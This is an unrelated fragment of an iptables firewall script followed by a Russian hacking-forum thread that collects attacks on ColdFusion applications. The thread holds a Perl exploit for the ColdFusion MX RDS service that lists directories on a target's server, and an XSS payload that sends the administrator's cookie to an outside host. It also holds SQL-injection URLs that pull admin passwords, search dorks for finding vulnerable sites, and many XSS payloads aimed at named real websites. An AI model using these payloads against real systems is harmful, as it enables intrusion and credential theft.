elif ! $IptablesBin -L $TempChain -n >/dev/null 2>&1 ; then
echo "No $TempChain chain in $Me, replace operation incomplete." >&2
elif [ "`$IptablesBin -L INPUT -n --line-numbers | grep $TempChain | wc -l`" -ne 1 ]; then
echo "Too few/many references to $TempChain in INPUT in $Me replacelinks, replace operation incomplete." >&2
elif [ "`$IptablesBin -L FORWARD -n --line-numbers | grep $TempChain | wc -l`" -ne 1 ]; then
echo "Too few/many references to $TempChain in FORWARD in $Me replacelinks, replace operation incomplete." >&2
elif [ "`$IptablesBin -L OUTPUT -n --line-numbers | grep $TempChain | wc -l`" -ne 1 ]; then
echo "Too few/many references to $TempChain in OUTPUT in $Me replacelinks, replace operation incomplete." >&2
else
#ZZZZ Place the same criteria you used in link/unlink above in the following three lines.
#ZZZZ Criteria should go just in front of "-j $Me"
$IptablesBin -R INPUT `$IptablesBin -L INPUT -n --line-numbers | grep $TempChain | awk '{print $1}'` -i \! lo -j $Me
$IptablesBin -R FORWARD `$IptablesBin -L FORWARD -n --line-numbers | grep $TempChain | awk '{print $1}'` -j $Me
$IptablesBin -R OUTPUT `$IptablesBin -L OUTPUT -n --line-numbers | grep $TempChain | awk '{print $1}'` -j $Me
DestroyChain $TempChain
unset TempChain
fi
;;
status)
if $IptablesBin -L $Me -n >/dev/null 2>&1 ; then
echo "$Me created" >&2
else
echo "$Me destroyed" >&2
fi
;;
version)
echo "$Me $MyVersion, firebrickslib $FBLibVer" >&2
;;
help)
DefaultHelp
#ZZZZ Please change the text to appropriate help text for this module. You should
#ZZZZ cover what the module does, if it's generally safe to use, and under what
#ZZZZ conditions it should not be used. Please replace the lines between the two
#ZZZZ EOTEXT lines with your own.
cat <<EOTEXT >&2
The $Me module puts in some blocks for fragmented icmp packets
(illegal) and address mask and timestamp requests and replies. At best,
these are uncommon and are used in network mapping. These rules should
be safe to use on any network.
EOTEXT
;;
*)
echo "Unknown action $Action in $Me, no action taken." >&2
;;
esac
done
|
|
|
|
27.05.2008, 15:20
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
XSS в СoldFusion 5.0
Администратор coldfusion может просматривать журнал приложений через Web браузер. Уязвимость позволяет атакующему записать произвольный Javascript код в application log, который будет выполнен при просмотре журнала администратором. Вот часть уязвимого кода:
<CFQUERY NAME="qProducts" DATASOURCE="#datasrc#">
SELECT * FROM Products
Where ProductId = #int(url.productid)#
</CFQUERY>
если функция INT сталкивается с не числовым значением, она выдает ошибку и пишет значение в журнал регистрации приложений. Если url.productid содержит что-то типа такого:
<iframe name="frame1" width="0" height="0"></iframe> <script>document.frame1.location="http://www.domain.com/index.cfm?stealcookie=" + document.cookie</script>
то при просмотре application log атакующий может похитить куки администратора, в которых хранится пароль в зашифрованном виде.
Переполнение буфера в Macromedia ColdFusion jrun.dll, приводящее к DoS'у IIS
Переполнение буфера обнаружено в ColdFusion MX server, когда он используется вместе с Microsoft IIS. При получении HTTP-заголовка, превышающего 4096 байт, и если template filename больше 8092 байт, произойдет переполнение в модуле 'jrun.dll'. Успешное использование баги может приводить к зависанию IIS и возможному выполнению произвольного кода.
ColdFusion MX Remote Development Service Exploit
PHP код:
#!/usr/bin/perl
# RDS_c_Dump.pl
# By angry packet
##
# THIS IS AN UNPATCHED VULNERABILITY - THIS IS AN UNPATCHED VULNERABILITY
#
# ColdFusion 6 MX Server does several things in order to get remote dir structure so we will need
# to recreate these functions. This is a "almost" complete emulation of a dreamweaver client connection,
# in like one full HTTP1/1 session witin netcat.
#
# I would like to point out that the ASPSESSID never validates so you can change this on the fly.
#
# Due to certian current situations I am not allowed to release full exploit code with
# ( READ, RETRIEVE, WRITE ) functions.
#
# Sample output:
# --------------------------------
# Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl
#
# POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1
#
# Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:
# Content-Length: 37
# Please wait.. ..
# HTTP/1.1 100 Continue
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
#
# HTTP/1.1 200 OK
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
# Connection: close
# Content-Type: text/html
#
# 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,
# 02:F:10:ntuser.dat1:66:1187843:0,02:F:3:sam1:65:204803:0,
# 02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,
# 02:F:9:setup.log1:66:1551943:0,02:F:8:software1:67:65331203:0,02:F:6:system1:66:9748483:0,0
# Vic7im1@cipher:~/Scripts/RDS_Sploit$
# ----------------------------------
use strict;
use IO::Socket;
use vars qw($response @clength @rarray);
## Dreamweaver string requests to ide.cfm
## --------------------------------------
#1: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#2: 3:STR:7:C:/_mm/STR:1:*STR:0: Content-Length: 28
#3: 3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 47
#4: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#5: 3:STR:10:C:/_notes/STR:1:*STR:0: Content-Length: 32
#6: 5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0 Content-Length: 50
#7: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#8: 5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0: Content-Length: 51
#9: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#10: 3:STR:3:C:/STR:1:*STR:0: Content-Length: 24
#11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 53
#13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 53
#15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0: Content-Length: 51
#17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#18: 3:STR:8:C:/WINNTSTR:1:*STR*STR:0: Content-Length: 29
#19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0: Content-Length: 37
# Static Content-Lenght: $string_val if you plan on leaving C:\WINNT\repair you will need to know
# the $string_val.
@clength = ( "Content-Length: 46",
"Content-Length: 28",
"Content-Length: 47",
"Content-Length: 46",
#"Content-Length: 32",
#"Content-Length: 50",
"Content-Length: 46",
"Content-Length: 51",
"Content-Length: 46",
"Content-Length: 24",
"Content-Length: 46",
"Content-Length: 53",
"Content-Length: 46",
"Content-Length: 53",
"Content-Length: 46",
"Content-Length: 51",
"Content-Length: 46",
"Content-Length: 29",
"Content-Length: 46",
"Content-Length: 37"
);
@rarray = ( "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:7:C:/_mm/STR:1:*STR:0:",
"3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
#"3:STR:10:C:/_notes/STR:1:*STR:0:",
#"5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:3:C:/STR:1:*STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:8:C:/WINNTSTR:1:*STR*STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"
);
system("clear");
# change target addy below.
my $TARGET = "192.168.0.100";
my $PORT = "80";
my $STRING = "C:/WINNT/repair";
my $POST = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n";
print "Generating Socket with Array Directory Values.\n";
my ( $i, $c);
for ( $i = 0; $i < @rarray; $i++ ) {
for ( $c = 0; $c < @clength; $c++ ) {
if( $i == $c ) {
&gen_sock($TARGET, $PORT, $rarray[$i], $clength[$c]);
}
}
}
sub gen_sock() {
my $sock = new IO::Socket::INET(PeerAddr => $TARGET,
PeerPort => $PORT,
Proto => 'tcp',
);
die "Socket Could not be established ! $!" unless $sock;
print "Target: $TARGET:$PORT\n";
print "$POST\n";
print "Request String Value: $rarray[$i]\n";
print "$clength[$c]\n";
print "Please wait.. ..\n";
print $sock "$POST";
print $sock "Content-Type: application/x-ColdFusionIDE\r\n";
print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n";
print $sock "Host: $TARGET\r\n";
print $sock "$clength[$c]\r\n";
print $sock "Connection: Keep-Alive\r\n";
print $sock "Cache-Control: no-cache\r\n";
print $sock "Cookie: ASPSESSIONIDQQQQGLDK=LPIHIKCAECKACDGPJCOLOAOJ\r\n";
print $sock "\r\n";
print $sock "$rarray[$i]";
# lets return and print data to term
while($response = <$sock>) {
chomp($response);
print "$response\n";
}
close($sock);
}
# milw0rm.com [2003-07-07]
Последний раз редактировалось Ded MustD!e; 27.05.2008 в 16:23..
|
|
|
|
27.05.2008, 16:28
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
CartWeaver (Details.cfm ProdID) Remote SQL Injection Vulnerability
admin_username:
http://www.site.com/Details.cfm?ProdID=1%20and%201=convert(int,(select %20top%201%20admin_username%20from%20tbl_adminuser s))
admin_password:
http://www.site.com/Details.cfm?ProdID=1%20and%201=convert(int,(select %20top%201%20char(97)%2badmin_password%20from%20tb l_adminusers))
admin:
http://www.site.com/[script path]/cw2/admin/
dork:
allinurl: Details.cfm?ProdID=
allinurl: Results.cfm?category=
QuickEStore <= 8.2 (insertorder.cfm) Remote SQL Injection Vulnerability
admin password:
http://www.site.com/insertorder.cfm?CFID=123&CFTOKEN=1 union select 1,2,3,password,5,6,7,8,9,10,11,12 from params"having 1=1
link admin:
http://www.site.com/admin/
XSS в Savvy Content Manager
Уязвимость существует из-за недостаточной обработки входных данных в параметре "searchterms" в сценариях searchresults.cfm, search_results.cfm и search_results/index.cfm.
Example:
http://www.ulsf.org/cgi-bin/searchresults.cfm?search=Search&searchterm="><scri pt>alert('Antichat')</script>
XSS в Tradingeye Shop
Уязвимость существует из-за недостаточной обработки входных данных в параметре "image" в сценарии details.cfm.
Example:
http://www.azumahallpro.com/site/details.cfm?image="><script>alert('Antichat')</script>
XSS в iPostMX 2005
Уязвимость существует из-за недостаточной обработки входных данных в параметре "RETURNURL" в сценариях userlogin.cfm и account.cfm.
Example:
http://www.scenta.co.uk/home/userlogin.cfm?returnUrl="><script>alert('Antichat' )</script>
XSS в Goss iCM
Уязвимость существует из-за недостаточной обработки входных данных в параметре "keyword" в сценарии index.cfm.
Example:
http://www.simtropolis.com/stex/index.cfm?Keyword="><script>alert('Antichat')</script>
SQL-Inj в 1WebCalendar
Уязвимость существует из-за недостаточной обработки входных данных в параметре "EventID" в сценарии "viewEvent.cfm", в параметре "NewsID" в сценарии "news/newsView.cfm" и параметре "ThisDate" в сценарии "mainCal.cfm".
Example:
http://events.lapl.org/viewEvent.cfm?eventID=-1+union+select+1,2,3,4,5,6,unhex(hex(concat_ws(0x3 a,lapl_email,lapl_email_password,network_loginID,n etwork_password,win_loginID,win_password,LoginID,M ainPassword))),8,9,10,11,12,131,4,15,16,17,18,9,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7+from+user_access+limit+0,1/*
XSS в CommonSpot
Уязвимость существует из-за недостаточной обработки входных данных в параметре "bNewWindow" в сценарии "loader.cfm".
Example:
http://author.heritage.org/About/Departments/loader.cfm?url=/commonspot/security/login.cfm&bNewWindow="><script>alert('Antichat')</script>
XSS в e-publish
Уязвимость существует из-за недостаточной обработки входных данных в параметрах "obcatid" и "comid" в сценарии "show.cfm".
Example:
http://www.paratiritisnews.gr/show_archive.cfm?id=200&obcatid=4"><IMG SRC="javascript:alert('Antichat');">
Примечание: не раз уже сталкивался с тем, что когда мы подставляем <script>alert()</script>, то в сорсе открывающий тег заменяется на <InvalidTag>. Обходится очень просто, пример выше.
XSS в Honeycomb Archive
Межсайтовый скриптинг возможен из-за недостаточной обработки входных данных в параметре "keyword" в сценарии "search.cfm".
Example:
http://www.scu.edu/siteindex/search.cfm?keyword="><IMG SRC="javascript:alert('Antichat');">
XSS в Hot Banana Web Content Management Suite
Уязвимость существует из-за недостаточной обработки входных данных в параметре "keywords" сценария "index.cfm".
Example:
http://www.robertmorris.edu/search/index.cfm?keywords="><IMG SRC="javascript:alert('Antichat');">
XSS в CF_Nuke
Межсайтовый скриптинг возможен из-за недостаточной обработки входных данных в параметрах "cat", "topic" и "newsid".
Example:
http://www.nora.org/index.cfm?sector=news&page=read&newsid="><IMG SRC="javascript:alert('Antichat');">
SQL-Inj в Magic Forum Personal
Уязвимость существует при обработке входных данных в параметрах "ForumID", "Thread" и "ThreadID" в сценарии "view_forum.cfm".
Example:
http://www.fecca.org.au/forum/view_forum.cfm?ForumID=1+or+1=(SELECT+TOP+1+cast(L ogin+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nv archar)+from+ForumUsers)--
XSS в Simple Message Board
Уязвимость существует из-за недостаточной обработки входных данных в сценариях 'forum.cfm', 'user.cfm', thread.cfm' и 'search.cfm'.
Example:
http://www.hungrymonster.com/messageboard/thread.cfm?TID="><IMG SRC="javascript:alert('Antichat');">
XSS в Quick Cart
Уязвимость существует из-за некорректной обработки входных данных в параметре 'search' сценария 'search.cfm'.
Example:
http://www.guardianhomeexchange.com/ihea/search.cfm?search="><IMG SRC="javascript:alert('Antichat');">
XSS в FuseTalk
Уязвимость существует из-за некорректной обработки входных данных в параметре 'ProfileID' модуля 'tombstone.cfm'.
Example:
http://www.wilmott.com/tombstone.cfm?ProfileID="><IMG SRC="javascript:alert('Antichat');">
Последний раз редактировалось Ded MustD!e; 27.05.2008 в 22:13..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
